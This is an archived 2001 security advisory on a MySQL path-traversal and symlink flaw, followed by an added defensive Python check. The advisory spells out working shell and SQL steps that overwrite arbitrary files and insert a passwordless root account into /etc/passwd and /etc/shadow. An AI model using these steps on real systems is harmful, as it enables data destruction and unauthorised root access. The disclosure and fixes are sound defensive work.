From: Pavlov, Lesha (leshaNN.RU)
Date: Sun Mar 18 2001 - 12:32:37 CST

    Anybody who gets a login and password to mysql can use it as a DoS or r00t
    exploit, because mysql accepts '../blah-blah' as a valid database name and
    each table is represented by 3 files: tablename.ISD, tablename.ISM and
    tablename.frm. But when mysqld checks whether a table already exists or
    not, it checks _only_ tablename.frm:

    Using this "vulnerable feature of mysql" to make a big DoS (will
    overwrite any file you wish):
    $ cd /var/tmp
    $ ln -s /some/file/you/wish/to/overwrite qqq.ISD
    $ mysql -u user -h localhost -p somepassword '../../tmp'
    create table qqq(www int);
    \q
    $
    File /some/file/you/wish/to/overwrite will be overwritten.

    Usage as a r00t exploit:
    $ cd /var/tmp
    $ ln -s /etc/passwd gotcha.ISD
    $ ln -s /etc/shadow make_me_r00t.ISD
    $ mysql -u user -h localhost -p somepassword '../../tmp'
    create table gotcha(qqq varchar(255));
    create table make_me_r00t(qqq varchar(255));
    insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
    insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
    \q
    $
    You getta r00t now!

    Recommendations:
    * Patch mysql so that when it checks whether a table is present, it
    checks all tablename.{ISD,ISM,frm} files, not only tablename.frm
    * Patch mysql to treat database names starting with '..' as incorrect
    database names.
    * And the main recommendation: do not run mysqld as root!!!

    Patches:
     not yet

    Workaround:
    chown existing database tables to a normal user and run mysqld as this
    unprivileged user; it will be a better solution!

    Vulnerable versions:
    This DoS/exploit was tested on mysql-3.20.32a, but I see other versions of
    mysql are also vulnerable.

    Comments:
    Mysql docs recommend not running mysqld as root, but people from RedHat
    didn't read the mysql docs; mysql installed from rpm is vulnerable.
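
The following Python is an added illustration, not part of the original post and not MySQL's own code: it implements the first two recommendations above as a pre-check for a CREATE TABLE request. Database and table names are restricted to identifier characters (so '..' and path separators are rejected up front), the database directory is verified to resolve under the data directory, and a table counts as already present if any of its .ISD/.ISM/.frm files exists or is a symlink, not only the .frm file. The function names, the datadir layout and the scenarios in demo() are constructed for this example.

```python
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Hypothetical names throughout; this is an added example, not MySQL's code.

# MySQL 3.x stored each table as three files with these extensions.
TABLE_FILE_EXTENSIONS = ("ISD", "ISM", "frm")

# Only plain identifier characters: no '/', no '.', so '..' cannot appear.
_NAME_RE = re.compile(r"[A-Za-z0-9_]+")


def is_safe_name(name: str) -> bool:
    """Reject any database/table name that could leave the data directory."""
    return _NAME_RE.fullmatch(name) is not None


def table_files(db_dir: Path, table: str) -> list[Path]:
    """All three on-disk files that make up one table."""
    return [db_dir / f"{table}.{ext}" for ext in TABLE_FILE_EXTENSIONS]


def check_create_table(datadir: str, db: str, table: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a CREATE TABLE request.

    Recommendation 2 from the post: names with '..' or separators are rejected.
    Recommendation 1 from the post: the table is treated as existing if ANY of
    its files exists (or is a symlink, dangling or not), not only the .frm.
    """
    for kind, name in (("database", db), ("table", table)):
        if not is_safe_name(name):
            return False, f"invalid {kind} name: {name!r}"

    root = Path(datadir).resolve()
    db_dir = (root / db).resolve()
    # Defence in depth: the database directory must still sit under datadir.
    if root not in db_dir.parents:
        return False, "database directory escapes datadir"
    if not db_dir.is_dir():
        return False, f"unknown database {db!r}"

    for path in table_files(db_dir, table):
        # is_symlink() is checked first because exists() follows links and
        # returns False for a dangling one, which would hide a planted link.
        if path.is_symlink() or path.exists():
            return False, f"refusing to create: {path.name} already present"
    return True, "ok"


def demo() -> dict[str, tuple[bool, str]]:
    """Build a constructed data directory and exercise the checks.

    Returns the decision for each scenario so callers can inspect them.
    """
    with tempfile.TemporaryDirectory() as tmp:
        datadir = Path(tmp) / "datadir"
        (datadir / "shop").mkdir(parents=True)
        victim = Path(tmp) / "victim.txt"
        victim.write_text("do not clobber\n")
        # Planted symlink: only the .ISD name exists, there is no .frm file.
        os.symlink(victim, datadir / "shop" / "qqq.ISD")
        # A real existing table: all three files present.
        for p in table_files(datadir / "shop", "orders"):
            p.touch()
        results = {
            "traversal_db_name": check_create_table(str(datadir), "../../tmp", "qqq"),
            "symlink_planted": check_create_table(str(datadir), "shop", "qqq"),
            "already_exists": check_create_table(str(datadir), "shop", "orders"),
            "fresh_table": check_create_table(str(datadir), "shop", "customers"),
        }
        # The checks never touched the file behind the symlink.
        assert victim.read_text() == "do not clobber\n"
        return results


if __name__ == "__main__":
    for scenario, (allowed, reason) in demo().items():
        print(f"{scenario:20} allowed={allowed} reason={reason}")
```

Running the block prints one decision per scenario; only the fresh table is allowed, while the traversal name, the planted symlink and the existing table are all refused. The name allow-list is deliberately stricter than "reject names starting with '..'", since a separator anywhere in the name is enough to leave the database directory.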